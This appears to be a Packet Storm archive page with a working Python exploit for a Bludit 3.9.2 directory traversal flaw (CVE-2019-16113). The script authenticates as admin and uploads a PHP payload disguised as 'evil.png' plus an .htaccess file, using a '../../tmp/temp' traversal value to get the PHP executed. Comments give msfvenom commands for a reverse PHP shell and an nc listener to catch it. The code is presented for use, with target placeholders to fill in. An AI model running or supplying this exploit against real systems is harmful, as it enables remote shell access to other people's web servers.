what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Bludit 3.9.2 Directory Traversal

Bludit 3.9.2 Directory Traversal
Posted Jul 27, 2020
Authored by James Green

Bludit version 3.9.2 suffers from a directory traversal vulnerability.

tags | exploit, file inclusion
advisories | CVE-2019-16113
SHA-256 | 04b5f1aa55ee5015b2d0e84c14444296ff3198d5f968e38841b92889937bd179

Bludit 3.9.2 Directory Traversal

Change Mirror Download
# Title: Bludit 3.9.2 - Directory Traversal
# Author: James Green
# Date: 2020-07-20
# Vendor Homepage: https://www.bludit.com
# Software Link: https://github.com/bludit/bludit
# Version: 3.9.2
# Tested on: Linux Ubuntu 19.10 Eoan
# CVE: CVE-2019-16113
#
# Special Thanks to Ali Faraj (@InfoSecAli) and authors of MSF Module https://www.exploit-db.com/exploits/47699

#### USAGE ####
# 1. Create payloads: .png with PHP payload and the .htaccess to treat .pngs like PHP
# 2. Change hardcoded values: URL is your target webapp, username and password is admin creds to get to the admin dir
# 3. Run the exploit
# 4. Start a listener to match your payload: `nc -nlvp 53`, meterpreter multi handler, etc
# 5. Visit your target web app and open the evil picture: visit url + /bl-content/tmp/temp/evil.png

#!/usr/bin/env python3

import requests
import re
import argparse
import random
import string
import base64
from requests.exceptions import Timeout

url = 'http://127.0.0.1' # CHANGE ME
username = 'James' # CHANGE ME
password = 'Summer2020' # CHANGE ME

# msfvenom -p php/reverse_php LHOST=127.0.0.1 LPORT=53 -f raw -b '"' > evil.png
# echo -e "<?php $(cat evil.png)" > evil.png
payload = 'evil.png' # CREATE ME

# echo "RewriteEngine off" > .htaccess
# echo "AddType application/x-httpd-php .png" >> .htaccess
payload2 = '.htaccess' # CREATE ME

def login(url,username,password):
""" Log in with provided admin creds, grab the cookie once authenticated """

session = requests.Session()
login_page = session.get(url + "/admin/")
csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"',
login_page.text
).group(1)
cookie = ((login_page.headers["Set-Cookie"]).split(";")[0].split("=")[1])
data = {"save":"",
"password":password,
"tokenCSRF":csrf_token,
"username":username}
headers = {"Origin":url,
"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Upgrade-Insecure-Requests":"1",
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0",
"Connection":"close",
"Referer": url + "/admin/",
"Accept-Language":"es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3",
"Accept-Encoding":"gzip, deflate",
"Content-Type":"application/x-www-form-urlencoded"
}
cookies = {"BLUDIT-KEY":cookie}
response = session.post(url + "/admin/",
data=data,
headers=headers,
cookies=cookies,
allow_redirects = False
)

print("cookie: " + cookie)
return cookie

def get_csrf_token(url,cookie):
""" Grab the CSRF token from an authed session """

session = requests.Session()
headers = {"Origin":url,
"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Upgrade-Insecure-Requests":"1",
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0",
"Connection":"close",
"Referer":url + "/admin/",
"Accept-Language":"es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3",
"Accept-Encoding":"gzip, deflate"}
cookies = {"BLUDIT-KEY":cookie}
response = session.get(url + "/admin/dashboard",
headers=headers,
cookies=cookies
)
csrf_token = response.text.split('var tokenCSRF = "')[1].split('"')[0]

print("csrf_token: " + csrf_token)
return csrf_token

def upload_evil_image(url, cookie, csrf_token, payload, override_uuid=False):
""" Upload files required for to execute PHP from malicious image files. Payload and .htaccess """

session = requests.Session()
files= {"images[]": (payload,
open(payload, "rb"),
"multipart/form-data",
{"Content-Type": "image/png", "filename":payload}
)}
if override_uuid:
data = {"uuid": "../../tmp/temp",
"tokenCSRF":csrf_token}
else:
# On the vuln app, this line occurs first:
# Filesystem::mv($_FILES['images']['tmp_name'][$uuid], PATH_TMP.$filename);
# Even though there is a file extension check, it won't really stop us
# from uploading the .htaccess file.
data = {"tokenCSRF":csrf_token}
headers = {"Origin":url,
"Accept":"*/*",
"X-Requested-With":"XMLHttpRequest",
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0",
"Connection":"close",
"Referer":url + "/admin/new-content",
"Accept-Language":"es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3",
"Accept-Encoding":"gzip, deflate",
}
cookies = {"BLUDIT-KEY":cookie}
response = session.post(url + "/admin/ajax/upload-images", data=data, files=files, headers=headers, cookies=cookies)
print("Uploading payload: " + payload)

if __name__ == "__main__":
cookie = login(url, username, password)
token = get_csrf_token(url, cookie)
upload_evil_image(url, cookie, token, payload, True)
upload_evil_image(url, cookie, token, payload2)
Login or Register to add favorites

File Archive:

June 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    19 Files
  • 2
    Jun 2nd
    16 Files
  • 3
    Jun 3rd
    28 Files
  • 4
    Jun 4th
    0 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    19 Files
  • 7
    Jun 7th
    23 Files
  • 8
    Jun 8th
    11 Files
  • 9
    Jun 9th
    10 Files
  • 10
    Jun 10th
    4 Files
  • 11
    Jun 11th
    0 Files
  • 12
    Jun 12th
    0 Files
  • 13
    Jun 13th
    0 Files
  • 14
    Jun 14th
    0 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    27 Files
  • 20
    Jun 20th
    65 Files
  • 21
    Jun 21st
    10 Files
  • 22
    Jun 22nd
    8 Files
  • 23
    Jun 23rd
    6 Files
  • 24
    Jun 24th
    6 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close